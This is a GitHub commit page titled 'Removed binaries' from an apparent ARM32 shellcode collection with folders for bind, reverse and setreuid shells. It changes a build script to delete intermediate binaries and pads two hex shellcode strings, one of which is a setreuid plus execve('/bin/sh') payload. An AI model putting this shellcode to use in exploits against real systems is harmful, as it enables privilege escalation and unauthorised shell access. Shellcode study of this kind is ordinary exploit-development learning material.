Skip to content

Commit fb833a7

Browse files
committed
Removed binaries
1 parent fe89b68 commit fb833a7

File tree

13 files changed

+3
-3
lines changed

13 files changed

+3
-3
lines changed

ARM32/assemble.sh

+1-1
Original file line numberDiff line numberDiff line change
@@ -6,6 +6,6 @@ do
66
arm-linux-gnueabihf-gcc $file -c -o $filename.o
77
arm-linux-gnueabihf-ld $filename.o -o $filename
88
arm-linux-gnueabihf-objcopy -O binary $filename $filename.bin
9-
rm $filename.o
9+
rm $filename $filename.o
1010
python ../shellconvert.py $filename.bin > $filename.hex
1111
done

ARM32/bind-shell/bind-shell

-904 Bytes
Binary file not shown.

ARM32/exit/exit

-724 Bytes
Binary file not shown.

ARM32/exit/exit.bin

2 Bytes
Binary file not shown.

ARM32/exit/exit.hex

+1-1
Original file line numberDiff line numberDiff line change
@@ -1 +1 @@
1-
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x01\x27\x40\x40\x01\xdf
1+
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x01\x27\x40\x40\x01\xdf\x00\xbf

ARM32/hello/hello

-788 Bytes
Binary file not shown.

ARM32/read-stage/read-stage

-768 Bytes
Binary file not shown.

ARM32/readfile/readfile

-844 Bytes
Binary file not shown.

ARM32/reverse-shell/reverse-shell

-892 Bytes
Binary file not shown.

ARM32/setreuid-shell/setreuid-shell

-848 Bytes
Binary file not shown.
2 Bytes
Binary file not shown.
+1-1
Original file line numberDiff line numberDiff line change
@@ -1 +1 @@
1-
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x06\x48\x01\x1c\x46\x27\x01\xdf\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78\xe8\x03
1+
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x06\x48\x01\x1c\x46\x27\x01\xdf\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78\xe8\x03\x00\xbf

ARM32/shell/shell

-780 Bytes
Binary file not shown.

0 commit comments

Comments
 (0)